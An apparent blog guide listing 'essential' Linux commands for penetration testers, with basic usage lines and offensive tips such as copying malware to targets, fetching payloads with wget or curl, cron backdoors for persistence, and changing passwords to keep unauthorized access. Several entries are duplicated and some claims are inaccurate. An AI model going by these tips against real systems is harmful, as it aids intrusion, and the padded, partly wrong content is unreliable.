Linux commands constitute the fundamental toolkit of a penetration tester or red team operator. Proficiency with these commands empowers effective reconnaissance, exploitation, privilege escalation, and more. In this comprehensive guide, we delve into the 50 most vital Linux commands, offering detailed explanations, command usage examples, and invaluable insights tailored for penetration testers and red team operators.
1. ls
– List Files and Directories
The ls
command is a crucial asset for reconnaissance, helping you identify and explore target systems:
Usage:
$ ls -l # Detailed listing
$ ls -a # Display hidden files
$ ls -R # List subdirectories recursively
Tip: Combine ls
with grep
to quickly locate sensitive files like configuration files or databases.
2. cd
– Change Directory
Navigating directories is vital for moving through a system during exploitation:
Usage:
$ cd Documents # Change to "Documents" directory
$ cd .. # Move to parent directory
$ cd /path/to/dir # Absolute path navigation
Tip: Change directories seamlessly to access target-specific files or directories.
3. pwd
– Print Working Directory
Understanding your current location is essential for efficient navigation:
Usage:
$ pwd
Tip: This command is crucial when you need to provide a precise file path in your scripts or exploits.
4. mkdir
– Make Directory
Creating directories is handy for storing your tools, scripts, and findings:
Usage:
$ mkdir Reports # Create "Reports" directory
$ mkdir -p A/B/C # Generate nested directories
Tip: Use -p
to generate nested directories at once, facilitating organized storage.
5. cp
– Copy Files and Directories
Replicating files and directories is useful for preserving evidence or executing payloads:
Usage:
$ cp file.txt dir/ # Copy file.txt to dir/
$ cp -r dir1 dir2/ # Recursively copy dir1 to dir2/
Tip: Copy malware or scripts to target systems for exploitation.
6. mv
– Move and Rename Files
Moving or renaming files aids in concealing your tracks or modifying system behavior:
Usage:
$ mv file.txt newdir/ # Move file.txt to newdir/
$ mv oldfile newfile # Rename oldfile to newfile
Tip: Rename suspicious files to bypass security mechanisms.
7. rm
– Remove Files and Directories
Deleting files or directories is vital to cover your tracks and remove evidence:
Usage:
$ rm file.txt # Erase file.txt
$ rm -r dir/ # Eliminate dir/ and its contents
Tip: Use with caution, as improper usage can lead to data loss.
8. cat
– Concatenate and Display File Contents
Inspecting file contents aids in understanding system configuration and identifying vulnerabilities:
Usage:
$ cat file.txt
Tip: Display configuration files to uncover sensitive information like passwords.
9. less
– View File Contents with Pagination
Reviewing file contents helps analyze configuration files and logs:
Usage:
$ less largefile.txt
Tip: Use grep
within less
to quickly search for keywords.
10. head
and tail
– Display Top and Bottom of Files
Viewing the beginning or end of files is useful for analyzing logs and output:
Usage:
$ head -n 10 file.txt # Display first 10 lines
$ tail -n 20 file.txt # Display last 20 lines
Tip: Monitor log files for potential security breaches or unauthorized access.
11. nano
– Basic Text Editor
Editing files can be helpful for altering configurations or creating malicious scripts:
Usage:
$ nano file.txt
Tip: Use nano
to quickly modify configuration files or write simple scripts.
12. grep
– Search Text in Files
Searching text patterns aids in identifying vulnerabilities or uncovering sensitive information:
Usage:
$ grep "pattern" file.txt
$ grep -r "pattern" dir/ # Recursive search in dir/
Tip: Identify exploitable vulnerabilities by searching for common patterns in source code.
13. find
– Search Files and Directories
Scouring files and directories is essential for locating sensitive data or exploitable targets:
Usage:
$ find /path -name "file.txt"
$ find / -type d -name "dir"
Tip: Use find
to identify potentially interesting files like password hashes or configuration files.
14. ps
– List Running Processes
Listing processes aids in identifying running applications and services:
Usage:
$ ps aux
Tip: Investigate unfamiliar processes to detect suspicious activities or unauthorized access.
15. kill
– Terminate Processes
Halting processes is useful to stop unwanted or malicious applications:
Usage:
$ kill PID
Tip: Use kill -9
to forcefully terminate unresponsive processes.
16. netstat
– Network Statistics
Monitoring network connections helps identify open ports or suspicious network activity:
Usage:
$ netstat -tuln # List listening ports
Tip: Analyze network connections for potential attack vectors.
17. ifconfig
– Configure Network Interfaces
Configuring network interfaces is essential for network-based exploitation:
Usage:
$ ifconfig eth0 up # Activate eth0
$ ifconfig eth0 down # Deactivate eth0
Tip: Manipulate network interfaces to establish reverse shells or pivot through networks.
18. ping
– Test Network Connectivity
Testing network connectivity aids in identifying live hosts:
Usage:
$ ping google.com
Tip: Use ping
to verify if a target is reachable and assess network latency.
19. wget
– Download Files from the Web
Downloading files from the internet facilitates obtaining tools or malware:
Usage:
$ wget http://example.com/file.zip
Tip: Download hacking tools or payloads directly to target systems.
20. curl
– Transfer Data with URLs
Transferring data via URLs is useful for obtaining information or executing commands:
Usage:
$ curl http://example.com
Tip: Use curl
to fetch payloads, scripts, or exploit code from remote servers.
21. ssh
– Secure Shell Remote Login
Logging into remote machines is crucial for remote exploitation:
Usage:
$ ssh user@hostname
Tip: Utilize ssh
to establish encrypted tunnels for secure communication.
22. scp
– Securely Copy Files Between Hosts
Copying files between
hosts securely aids in moving tools or data for exploitation:
Usage:
$ scp file.txt user@hostname:/path
Tip: Exploit vulnerable servers by transferring payloads via scp
.
23. chmod
– Change File Permissions
Altering file permissions is essential for executing scripts or accessing sensitive data:
Usage:
$ chmod +x script.sh # Add execute permission
$ chmod 644 file.txt # Set specific permissions
Tip: Modify permissions to escalate privileges or execute malicious code.
24. chown
– Change Ownership of Files
Modifying file ownership helps gain access to files or cover your tracks:
Usage:
$ chown user:group file.txt
Tip: Change ownership of sensitive files to gain access or manipulate data.
25. df
– Display Disk Space Usage
Monitoring disk space is vital for identifying potential storage issues or vulnerabilities:
Usage:
$ df -h
Tip: Identify disk space issues that might lead to denial-of-service attacks.
26. du
– Display File and Directory Space Usage
Displaying file and directory space usage helps locate large or suspicious files:
Usage:
$ du -sh dir/
Tip: Scan directories for large files that might contain sensitive information.
27. tar
– Archive and Extract Files
Archiving and extracting files is handy for collecting evidence or transferring data:
Usage:
$ tar -czvf archive.tar.gz files/ # Create gzipped archive
$ tar -xzvf archive.tar.gz # Extract gzipped archive
Tip: Package logs and sensitive files for later analysis.
28. zip
and unzip
– Create and Extract ZIP Archives
Creating and extracting ZIP archives is useful for transferring multiple files:
Usage:
$ zip -r archive.zip files/ # Create ZIP archive
$ unzip archive.zip # Extract ZIP archive
Tip: Compress and transport multiple payloads or tools with ease.
29. top
– Monitor System Activity
Real-time system monitoring helps identify resource consumption and anomalies:
Usage:
$ top
Tip: Detect malware or unauthorized activities consuming system resources.
30. htop
– Interactive System Monitoring
Interactive system monitoring aids in identifying resource usage in real time:
Usage:
$ htop
Tip: Spot malicious processes or sudden spikes in resource usage.
31. grep
– Text Search in Files
Searching text patterns aids in identifying vulnerabilities or uncovering sensitive information:
Usage:
$ grep "pattern" file.txt
Tip: Identify exploitable vulnerabilities by searching for common patterns in source code.
32. sed
– Stream Editor for Text Manipulation
Streamlining text manipulation assists in crafting payloads or modifying configuration files:
Usage:
$ sed 's/old/new/g' file.txt
Tip: Craft payloads or modify configuration files for privilege escalation.
33. awk
– Text Processing and Pattern Matching
Text processing and pattern matching help extract specific data from files:
Usage:
$ awk '{print $1}' file.txt
Tip: Extract passwords, user data, or sensitive information from configuration files.
34. sort
– Sort Lines of Text Files
Sorting lines aids in organizing data or extracting unique entries:
Usage:
$ sort file.txt
Tip: Sort and analyze data, such as password lists or user data.
35. uniq
– Report or Omit Repeated Lines
Removing duplicates aids in cleaning and analyzing data:
Usage:
$ uniq file.txt
Tip: Identify unique entries in lists, such as usernames or email addresses.
36. cut
– Remove Sections from Lines of Files
Extracting specific sections from lines helps in data manipulation:
Usage:
$ cut -d":" -f1,3 file.txt
Tip: Extract specific fields from configuration files for analysis.
37. tee
– Redirect Output to File and Screen
Redirecting output is useful for capturing results while monitoring in real time:
Usage:
$ command | tee output.txt
Tip: Capture output from commands to analyze results and detect vulnerabilities.
38. date
– Display or Set Date and Time
Manipulating date and time assists in simulating attacks and analyzing logs:
Usage:
$ date
$ date "+%Y-%m-%d %H:%M:%S"
Tip: Modify system time for timestamp-based attacks or evading detection.
39. whoami
– Print Effective User ID
Displaying the current user’s ID helps assess available privileges:
Usage:
$ whoami
Tip: Determine your user context to assess the extent of your access.
40. useradd
and userdel
– Add and Delete Users
Managing user accounts aids in privilege escalation and lateral movement:
Usage:
$ sudo useradd newuser
$ sudo userdel olduser
Tip: Exploit weak user accounts or escalate privileges by adding new users.
41. passwd
– Change User Password
Changing user passwords assists in privilege escalation or maintaining access:
Usage:
$ passwd username
Tip: Change passwords to maintain unauthorized access to compromised accounts.
42. sudo
– Execute Command as Superuser
Gaining superuser privileges is essential for performing critical operations:
Usage:
$ sudo apt update
$ sudo reboot
Tip: Exploit vulnerabilities to gain access to root-level privileges.
43. crontab
– Schedule Tasks
Scheduling tasks can be leveraged for persistence and lateral movement:
Usage:
$ crontab -e # Edit crontab entries
$ crontab -l # List crontab entries
Tip: Set up cron jobs to execute backdoors or maintain persistence.
44. chmod
– Change File Permissions
Altering file permissions is crucial for privilege escalation and accessing sensitive data:
Usage:
$ chmod +x script.sh # Add execute permission
$ chmod 644 file.txt # Set specific permissions
Tip: Modify permissions to escalate privileges or execute malicious code.
45. chown
– Change Ownership of Files
Changing ownership aids in gaining access to files or maintaining persistence:
Usage:
$ chown user:group file.txt
Tip: Change ownership of sensitive files to gain access or manipulate data.
46. df
– Display Disk Space Usage
Monitoring disk space is vital for identifying potential storage issues or vulnerabilities:
Usage:
$ df -h
Tip: Identify disk space issues that might lead to denial-of-service attacks.
47. du
– Display File and
Directory Space Usage
Displaying file and directory space usage helps locate large or suspicious files:
Usage:
$ du -sh dir/
Tip: Scan directories for large files that might contain sensitive information.
48. tar
– Archive and Extract Files
Archiving and extracting files is handy for collecting evidence or transferring data:
Usage:
$ tar -czvf archive.tar.gz files/ # Create gzipped archive
$ tar -xzvf archive.tar.gz # Extract gzipped archive
Tip: Package logs and sensitive files for later analysis.
49. zip
and unzip
– Create and Extract ZIP Archives
Creating and extracting ZIP archives is useful for transferring multiple files:
Usage:
$ zip -r archive.zip files/ # Create ZIP archive
$ unzip archive.zip # Extract ZIP archive
Tip: Compress and transport multiple payloads or tools with ease.
50. history
– Command History
Viewing your command history helps replicate successful operations and learn from mistakes:
Usage:
$ history
Tip: Identify patterns in your commands and replicate successful exploitation techniques.
Gaining proficiency with these 50 Linux commands is an essential milestone in becoming a skilled penetration tester or red team operator. By mastering these tools and techniques, you’ll be well-equipped to navigate diverse scenarios, from reconnaissance to exploitation and beyond. Continuously refine your skills, delve into more advanced Linux concepts, and build a comprehensive toolkit that empowers you to excel in the dynamic realm of cybersecurity. Wishing you success and discovery in your penetration testing and red teaming journey!